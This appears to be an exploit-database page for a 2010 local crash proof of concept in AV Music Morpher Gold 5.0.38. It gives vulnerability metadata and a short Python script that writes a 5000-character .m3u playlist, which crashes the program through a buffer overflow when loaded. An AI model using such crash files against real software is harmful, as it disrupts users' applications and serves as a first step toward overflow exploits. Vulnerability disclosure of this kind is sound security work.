header-logo
Suggest Exploit
vendor:
AV Music Morpher Gold
by:
b0telh0
7,5
CVSS
HIGH
Local Crash
119
CWE
Product Name: AV Music Morpher Gold
Affected Version From: 5.0.38
Affected Version To: 5.0.38
Patch Exists: NO
Related CWE: N/A
CPE: a:avnex:av_music_morpher_gold
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

AV Music Morpher Gold (.m3u) Local Crash PoC

AV Music Morpher Gold is vulnerable to a local crash when a specially crafted .m3u file is opened. The application will crash when a .m3u file containing 5000 'A' characters is opened. Additionally, .acd and .bdi files will also cause the application to crash.

Mitigation:

Users should avoid opening untrusted .m3u, .acd, and .bdi files.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Title: AV Music Morpher Gold (.m3u) Local Crash PoC
# Date: 08-20-2010
# Author: b0telh0
# Software Link: http://www.musicmorpher.com/download.php?product=musicgold
# Version: 5.0.38
# Tested on: Windows XP SP3 (pt-br) VirtualBox

#
# *.acd and *.bdi files will crash the application too!


crash = "\x41" * 5000

try:
    file = open('b0t.m3u','w');
    file.write(crash);
    file.close();
    print "\n[+] b0t.m3u created."
    print "[+] Burner > Create New Audio CD > Right click and 'Add playlist'"
    print "[+] Select b0t.m3u and boom.\n"
except:
    print "\n[-] Error.. Error.. Error.. Error..\n"

Navigation

Suggest Exploit

Services By CQR